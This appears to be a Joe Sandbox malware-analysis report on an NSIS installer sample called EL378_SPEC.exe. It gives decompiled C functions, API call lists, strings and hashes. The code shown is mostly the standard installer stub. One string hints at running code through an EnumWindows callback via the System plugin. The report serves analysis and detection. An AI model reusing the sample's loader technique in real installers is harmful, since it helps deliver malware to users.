Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\mnstring$C:\Users\user\AppData\Local\Temp\nsb12B3.tmp$C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll$Call$user32::EnumWindows(i r1 ,i 0)
API String ID: 3895412863-986951018
Opcode ID: ea0c32077257460a6500ecf870796efa4c25f39d0cf7405ae546488f536fcbdb
Instruction ID: 8c1cf908ae02b995a3a41f7ffac76b054db7533a66b8d62ade7f549c41348504
Opcode Fuzzy Hash: ea0c32077257460a6500ecf870796efa4c25f39d0cf7405ae546488f536fcbdb
Instruction Fuzzy Hash: 38D10870604301BBD710AF26CD85E2B76A8EF85359F204A3FF452B62E1D77CD9019A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004033ED Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004033ED(void* __eflags, signed int _a4) {
				char _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				long _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				long _t35;
				void* _t45;
				intOrPtr* _t49;
				long _t50;
				void* _t56;
				intOrPtr _t64;
				struct HINSTANCE__* _t70;
				signed int _t72;
				void* _t73;
				void* _t76;
				intOrPtr _t78;
				long _t80;
				long _t83;
				long _t86;
				void* _t87;
				void* _t88;

				_t80 = 0;
				_t70 = 0;
				_v32 = 0;
				_v36 = 0;
				_t35 = GetTickCount();
				_t84 = L"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe";
				 *0x435a00 = _t35 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\EL378_SPEC.exe", 0x400);
				_t88 = E0040691B(_t84, "true", 3);
				 *0x40b010 = _t88;
				if(_t88 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t85 = L"C:\\Users\\Arthur\\Desktop";
				E00406B1A(L"C:\\Users\\Arthur\\Desktop", _t84);
				E00406B1A(0x444000, E00406D10(_t85));
				_t86 = GetFileSize(_t88, 0);
				 *0x40d968 = _t86;
				if(_t86 == 0) {
					L21:
					E00403389("true");
					_pop(_t73);
					if( *0x435a08 == 0) {
						L32:
						return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
					}
					if(_t70 == 0) {
						L25:
						_t45 = GlobalAlloc("true", _v8); // executed
						_t87 = _t45;
						E00403131( *0x435a08 + 0x1c);
						if(E00403148(0xffffffff, 0, _t87, _v12) != _v28) {
							goto L32;
						}
						 *0x435a10 = _t87;
						 *0x435a0c =  *_t87;
						if((_v28 & 0x00000001) != 0) {
							 *0x435a04 =  *0x435a04 + 1;
						}
						_push("true");
						_pop(_t76);
						_t49 = _t87 + 0x44;
						do {
							_t49 = _t49 - 8;
							 *_t49 =  *_t49 + _t87;
							_t76 = _t76 - 1;
						} while (_t76 != 0);
						_t50 = SetFilePointer(_t88, 0, 0, "true"); // executed
						 *(_t87 + 0x3c) = _t50;
						E004066B4(0x435a20, _t87 + 4, "true");
						return 0;
					}
					E00403131( *0x40d96c);
					_t56 = E00406948(_t73,  *0x40b010,  &_v0, "true"); // executed
					if(_t56 == 0 || _t80 != _a4) {
						goto L32;
					} else {
						goto L25;
					}
				}
				_t72 = _a4;
				while(1) {
					_t82 =  !=  ? 0x8000 : 0x200;
					_t83 =  <  ? _t86 :  !=  ? 0x8000 : 0x200;
					if(E0040311B(0x417538, 0x200) == 0) {
						break;
					}
					if( *0x435a08 != 0) {
						if((_t72 & 0x00000002) == 0) {
							E00403389(0);
						}
						L17:
						if(_t86 <  *0x40d968) {
							_v44 = E00406E3C(_v32, 0x417538, _t83);
						}
						 *0x40d96c =  *0x40d96c + _t83;
						_t86 = _t86 - _t83;
						if(_t86 != 0) {
							continue;
						} else {
							L20:
							_t80 = _v32;
							_t22 =  &_v36; // 0x417538
							_t70 =  *_t22;
							goto L21;
						}
					}
					E004066B4( &_v28, 0x417538, "true");
					if((_v40 & 0xfffffff0) == 0 && _v24 == 0xdeadbeef && _v12 == 0x74736e49 && _v16 == 0x74666f73 && _v20 == 0x6c6c754e) {
						_t64 =  *0x40d96c; // 0x9007d
						_t72 = _t72 | _v28;
						_t78 = _v4;
						 *0x435a08 = _t64;
						 *0x435ae0 =  *0x435ae0 | _t72 & 0x00000002;
						if(_t78 > _t86) {
							goto L32;
						}
						if((_t72 & 0x0000000c) == 4) {
							goto L20;
						}
						_v36 = _v36 + 1;
						_t86 = _t78 - 4;
						if(0x200 > _t86) {
							_t83 = _t86;
						}
					}
					goto L17;
				}
				E00403389("true");
				goto L32;
			}

0x004033f4
0x004033f6
0x004033f8
0x004033fc
0x00403400
0x0040340b
0x00403417
0x0040341c
0x0040342f
0x00403431
0x0040343a
0x00000000
0x0040343c
0x00403447
0x0040344d
0x0040345e
0x0040346c
0x0040346e
0x00403476
0x00403572
0x00403574
0x00403580
0x00403581
0x00403640
0x00000000
0x00403640
0x00403589
0x004035ba
0x004035c0
0x004035cc
0x004035d2
0x004035ea
0x00000000
0x00000000
0x004035f1
0x004035f9
0x004035fe
0x00403600
0x00403600
0x00403606
0x00403608
0x00403609
0x0040360c
0x0040360c
0x0040360f
0x00403611
0x00403611
0x0040361b
0x00403621
0x0040362f
0x00000000
0x00403634
0x00403591
0x004035a3
0x004035aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004035aa
0x0040347c
0x00403480
0x00403491
0x00403496
0x004034a6
0x00000000
0x00000000
0x004034b3
0x00403537
0x0040353b
0x00403540
0x00403541
0x00403547
0x00403558
0x00403558
0x0040355c
0x00403562
0x00403564
0x00000000
0x0040356a
0x0040356a
0x0040356a
0x0040356e
0x0040356e
0x00000000
0x0040356e
0x00403564
0x004034c1
0x004034ce
0x004034f8
0x004034fd
0x00403501
0x00403505
0x0040350f
0x00403517
0x00000000
0x00000000
0x00403523
0x00000000
0x00000000
0x00403525
0x00403529
0x0040352e
0x00403530
0x00403530
0x0040352e
0x00000000
0x004034ce
0x0040363a
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00403400
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\EL378_SPEC.exe,00000400,?,?,?,?,?), ref: 0040341C

Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\EL378_SPEC.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\EL378_SPEC.exe,C:\Users\user\Desktop\EL378_SPEC.exe,80000000,00000003,?,?,?,?,?), ref: 00403466
GlobalAlloc.KERNELBASE(?,?,?,?,?,?,?), ref: 004035C0

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033F3
Null, xrefs: 004034EE
8uA, xrefs: 0040356E
Error launching installer, xrefs: 0040343C
Inst, xrefs: 004034DA
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 00403452
C:\Users\user\Desktop\EL378_SPEC.exe, xrefs: 0040340B, 00403415, 00403429, 00403446
soft, xrefs: 004034E4
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403640

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: 8uA$C:\Users\user\Desktop$C:\Users\user\Desktop\EL378_SPEC.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1784525812
Opcode ID: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
Instruction ID: 38a706e546d8de2da2def33f7086105d1948706aa1bd56b4a23ee49e5693a868
Opcode Fuzzy Hash: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
Instruction Fuzzy Hash: 0A51B171504310BFD720AF21DD81B1B7BA8AB4471AF10093FFA55B72E1C7789A848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405EBA Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00405EBA() {
				signed int _t33;
				WCHAR* _t35;
				void* _t39;
				void* _t40;
				short _t41;
				signed int _t46;
				void* _t48;
				int _t49;
				void* _t58;
				signed int _t59;
				signed int _t60;
				signed int _t65;
				WCHAR* _t78;
				signed char* _t80;
				signed int _t84;
				signed int _t85;
				WCHAR* _t90;
				short _t91;
				WCHAR* _t93;
				void* _t96;
				signed int _t101;
				signed int _t103;
				signed char* _t107;
				signed int _t110;
				void* _t111;

				_t33 =  *(_t111 + 8);
				if(_t33 < 0) {
					_t33 =  *( *0x4349e0 - 4 + _t33 * 4);
				}
				_t90 = 0x4339a0;
				_t78 =  *(_t111 + 0x1c);
				_t107 =  *0x435a38 + _t33 * 2;
				_t93 = 0x4339a0;
				if(_t78 >= 0x4339a0 && _t78 - 0x4339a0 >> 1 < 0x800) {
					_t93 = _t78;
					_t78 = 0;
					 *((intOrPtr*)(_t111 + 0x24)) = 0;
				}
				_t84 =  *_t107 & 0x0000ffff;
				if(_t84 == 0) {
					L41:
					 *_t93 = 0;
					if(_t78 == 0) {
						_t35 = _t90;
					} else {
						_t35 = E00406B1A(_t78, _t90);
					}
					return _t35;
				} else {
					_t96 = 2;
					while(1) {
						_t80 = _t107;
						if((_t93 - _t90 & 0xfffffffe) >= 0x800) {
							break;
						}
						_push("true");
						_t91 = _t84 & 0x0000ffff;
						_t107 =  &(_t107[_t96]);
						_pop(_t39);
						if(_t91 >= _t39) {
							if(__eflags != 0) {
								 *_t93 = _t91;
							} else {
								_t41 =  *_t107;
								_t107 =  &(_t80[4]);
								 *_t93 = _t41;
							}
							_t40 = _t96;
							L39:
							_t84 =  *_t107 & 0x0000ffff;
							_t93 = _t93 + _t40;
							_t90 = 0x4339a0;
							if(_t84 != 0) {
								continue;
							}
							break;
						}
						_t85 =  *_t107 & 0x000000ff;
						_t101 = (_t80[3] & 0x0000007f) << 0x00000007 |  *_t107 & 0x0000007f;
						 *(_t111 + 0x18) = _t85;
						 *(_t111 + 0x14) = _t85 | 0x00008000;
						_t46 = _t107[1] & 0x000000ff;
						_t107 =  &(_t80[4]);
						 *(_t111 + 0x20) = _t46;
						 *(_t111 + 0x20) = _t46 | 0x00008000;
						_t48 = 2;
						 *(_t111 + 0x10) = _t107;
						if(_t91 != _t48) {
							__eflags = _t91 - 3;
							if(_t91 != 3) {
								__eflags = _t91 - 1;
								if(__eflags == 0) {
									_push( !_t101);
									_push(_t93);
									E00405EBA();
								}
							} else {
								__eflags = _t101 - 0x1d;
								if(__eflags != 0) {
									E00406B1A(_t93, L"user32::EnumWindows(i r1 ,i 0)" + (_t101 << 0xb));
									__eflags = _t101 - 0x15 - 7;
									if(__eflags < 0) {
										E00406D3D(_t93);
									}
								} else {
									E0040661F(_t93,  *0x4349f8);
								}
							}
							L34:
							_t49 = lstrlenW(_t93);
							_t40 = _t49 + _t49;
							_t96 = 2;
							goto L39;
						}
						_push("true");
						_pop(_t58);
						_t110 =  !=  ? _t58 : _t48;
						_t121 = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 != 0x24) {
									do {
										_t59 =  *0x4349f0;
										_t110 = _t110 - 1;
										__eflags = _t59;
										if(_t59 == 0) {
											L19:
											_t60 = _t111 + 0x2c;
											_push(_t60);
											_push( *((intOrPtr*)(_t111 + 0x18 + _t110 * 4)));
											_push( *0x4349f8);
											L0040802C();
											__eflags = _t60;
											if(_t60 != 0) {
												goto L21;
											}
											__imp__SHGetPathFromIDListW( *((intOrPtr*)(_t111 + 0x30)), _t93);
											__imp__CoTaskMemFree( *(_t111 + 0x2c));
											__eflags = _t60;
											if(_t60 != 0) {
												break;
											}
											goto L21;
										}
										_t65 =  *_t59( *0x4349f8,  *((intOrPtr*)(_t111 + 0x20 + _t110 * 4)), 0, 0, _t93); // executed
										__eflags = _t65;
										if(_t65 == 0) {
											break;
										}
										goto L19;
										L21:
										 *_t93 = 0;
										__eflags = _t110;
									} while (_t110 != 0);
									L22:
									_t103 =  *(_t111 + 0x20);
									goto L23;
								}
								GetWindowsDirectoryW(_t93, 0x400);
								goto L22;
							}
							GetSystemDirectoryW(_t93, 0x400);
							goto L22;
						} else {
							E00406977(_t85 & 0x0000003f, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x435a38 + (_t85 & 0x0000003f) * 2, _t93, _t85 & 0x00000040);
							_t103 =  *(_t111 + 0x20);
							if( *_t93 == 0) {
								_push(_t103);
								_push(_t93);
								E00405EBA();
							}
							L23:
							if( *_t93 != 0 && _t103 == 0x1a) {
								lstrcatW(_t93, L"\\Microsoft\\Internet Explorer\\Quick Launch");
							}
							E00406D3D(_t93);
							_t107 =  *(_t111 + 0x10);
							goto L34;
						}
					}
					_t78 =  *(_t111 + 0x28);
					goto L41;
				}
			}

0x00405eba
0x00405ec3
0x00405ed4
0x00405ed4
0x00405edc
0x00405ee2
0x00405ee7
0x00405eed
0x00405ef1
0x00405f00
0x00405f02
0x00405f04
0x00405f04
0x00405f08
0x00405f0f
0x00406103
0x00406105
0x0040610a
0x00406115
0x0040610c
0x0040610e
0x0040610e
0x0040611d
0x00405f15
0x00405f18
0x00405f19
0x00405f1b
0x00405f27
0x00000000
0x00000000
0x00405f2d
0x00405f2f
0x00405f32
0x00405f34
0x00405f38
0x004060d7
0x004060e5
0x004060d9
0x004060d9
0x004060dd
0x004060e0
0x004060e0
0x004060e8
0x004060ea
0x004060ea
0x004060ee
0x004060f0
0x004060f8
0x00000000
0x00000000
0x00000000
0x004060f8
0x00405f49
0x00405f53
0x00405f55
0x00405f60
0x00405f64
0x00405f68
0x00405f6b
0x00405f76
0x00405f7a
0x00405f7b
0x00405f82
0x00406082
0x00406085
0x004060bb
0x004060be
0x004060c2
0x004060c3
0x004060c4
0x004060c4
0x00406087
0x00406087
0x0040608a
0x004060a6
0x004060ae
0x004060b1
0x004060b4
0x004060b4
0x0040608c
0x00406093
0x00406093
0x0040608a
0x004060c9
0x004060ca
0x004060d2
0x004060d4
0x00000000
0x004060d4
0x00405f91
0x00405f93
0x00405f94
0x00405f97
0x00405f99
0x00405fd9
0x00405fdc
0x00405fec
0x00405fef
0x00405fff
0x00405fff
0x00406004
0x00406005
0x00406007
0x0040601e
0x0040601e
0x00406022
0x00406023
0x00406027
0x0040602d
0x00406032
0x00406034
0x00000000
0x00000000
0x0040603b
0x00406047
0x0040604d
0x0040604f
0x00000000
0x00000000
0x00000000
0x0040604f
0x00406018
0x0040601a
0x0040601c
0x00000000
0x00000000
0x00000000
0x00406051
0x00406053
0x00406056
0x00406056
0x0040605a
0x0040605a
0x00000000
0x0040605a
0x00405ff7
0x00000000
0x00405ff7
0x00405fe4
0x00000000
0x00405f9b
0x00405fb9
0x00405fc3
0x00405fc7
0x00405fcd
0x00405fce
0x00405fcf
0x00405fcf
0x0040605e
0x00406063
0x00406070
0x00406070
0x00406077
0x0040607c
0x00000000
0x0040607c
0x00405f99
0x004060fe
0x00000000
0x00406102

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FE4

Part of subcall function 00406B1A: lstrcpynW.KERNEL32(?,?,00000400,00403871,00434A00,NSIS Error), ref: 00406B27

Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DB2
Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DC6
Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 00406DDE

GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,?,?,?,?,00000000,?,?), ref: 00405FF7
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,?,?,?,?,00000000,?,?), ref: 004060CA

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040606A
user32::EnumWindows(i r1 ,i 0), xrefs: 0040609F
Call, xrefs: 00405EDC, 00405FAA, 00405FCE, 00405FE3, 00405FF6, 00406009, 00406036, 0040606F, 00406076, 00406092, 004060A5, 004060B3, 004060C3, 004060C9, 004060F0, 0040610C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405FAF
Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 00405F15

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
API String ID: 4187626192-480082693
Opcode ID: 311af7c87eb71035c8d5b2a7baacc15b69a4590f910f25a3f4acb13c9fbad21a
Instruction ID: 8c51b57b95ad5d2f56c6428f73255cfba4eda90222275d8884e674a65d57f274
Opcode Fuzzy Hash: 311af7c87eb71035c8d5b2a7baacc15b69a4590f910f25a3f4acb13c9fbad21a
Instruction Fuzzy Hash: 05611471240216ABDB20AF248C40A7B76A5EF99314F12453FF942FB2D1D77CD9218B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D3A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00405D3A(signed int _a4, WCHAR* _a8) {
				WCHAR* _v40;
				long _v52;
				int _v56;
				void* _v60;
				void* _t18;
				signed int _t19;
				long _t20;
				signed char _t29;
				signed int _t35;
				WCHAR* _t39;
				WCHAR* _t40;
				struct HWND__* _t43;

				_t43 =  *0x4349e8;
				if(_t43 == 0) {
					return _t18;
				}
				_t29 =  *0x435af4;
				_t35 = _t29 & 0x00000001;
				if(_t35 == 0) {
					_push(_a4);
					_push(0x42ed78);
					E00405EBA();
				}
				_t19 = lstrlenW(0x42ed78);
				_t39 = _a8;
				_a4 = _t19;
				if(_t39 == 0) {
					_t40 = 0x42ed78;
					goto L7;
				} else {
					_t19 = lstrlenW(_t39) + _a4;
					if(_t19 >= 0x1000) {
						L13:
						return _t19;
					}
					_t40 = 0x42ed78;
					_t19 = lstrcatW(0x42ed78, _t39);
					L7:
					if((_t29 & 0x00000004) == 0) {
						_t19 = SetWindowTextW( *0x4349c8, _t40); // executed
					}
					if((_t29 & 0x00000002) == 0) {
						_v40 = _t40;
						_v60 = 1;
						_t20 = SendMessageW(_t43, 0x1004, 0, 0); // executed
						_v52 = 0;
						_v56 = _t20 - _t35;
						SendMessageW(_t43, 0x104d - _t35, 0,  &_v60); // executed
						_t19 = SendMessageW(_t43, 0x1013, _v56, 0); // executed
					}
					if(_t35 != 0) {
						_t19 = _a4;
						0x42ed78[_t19] = 0;
					}
					goto L13;
				}
			}

0x00405d3e
0x00405d46
0x00405e1b
0x00405e1b
0x00405d4d
0x00405d5c
0x00405d5f
0x00405d61
0x00405d65
0x00405d66
0x00405d66
0x00405d6c
0x00405d71
0x00405d75
0x00405d7b
0x00405da0
0x00000000
0x00405d7d
0x00405d83
0x00405d8c
0x00405e14
0x00000000
0x00405e16
0x00405d93
0x00405d99
0x00405da5
0x00405da8
0x00405db1
0x00405db1
0x00405dba
0x00405dbe
0x00405dd0
0x00405dd8
0x00405ddc
0x00405de0
0x00405df3
0x00405e00
0x00405e00
0x00405e04
0x00405e06
0x00405e0c
0x00405e0c
0x00000000
0x00405e04

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?), ref: 00405D99
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll), ref: 00405DB1
SendMessageW.USER32(?), ref: 00405DD8
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 00405D57, 00405D65, 00405D6B, 00405D93, 00405D98, 00405DA0, 00405DAA

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll
API String ID: 1759915248-380433507
Opcode ID: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
Instruction ID: 65e3057419f119a88936ccc655a9da3a15af0d16a1f773064a71e2051a7db8da
Opcode Fuzzy Hash: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
Instruction Fuzzy Hash: D121C2B2A056206BD310AB59DC44AABBBDCEF94710F45043FB984A3291C7B89D404AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040619E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040619E(intOrPtr _a4) {
				short _v576;
				int _t8;
				void* _t9;
				struct HINSTANCE__* _t13;
				void* _t14;
				void* _t19;

				_t8 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t8 > 0x104 || _t8 == 0) {
					_t9 = 0;
					goto L5;
				} else {
					_t9 = _t8 + _t8;
					if( *((short*)(_t19 + _t9 - 0x23e)) == 0x5c) {
						L5:
						_t14 = 0x4092b2;
					} else {
						_t14 = 0x4092b0;
					}
				}
				wsprintfW(_t9 +  &_v576, L"%s%S.dll", _t14, _a4);
				_t13 = LoadLibraryExW( &_v576, 0, "true"); // executed
				return _t13;
			}

0x004061b5
0x004061be
0x004061d8
0x00000000
0x004061c4
0x004061c4
0x004061cf
0x004061da
0x004061da
0x004061d1
0x004061d1
0x004061d1
0x004061cf
0x004061f1
0x00406205
0x0040620c

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
wsprintfW.USER32 ref: 004061F1
LoadLibraryExW.KERNELBASE(?,00000000,?), ref: 00406205

Strings

%s%S.dll, xrefs: 004061EB
\, xrefs: 004061C6
UXTHEME, xrefs: 004061AD

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

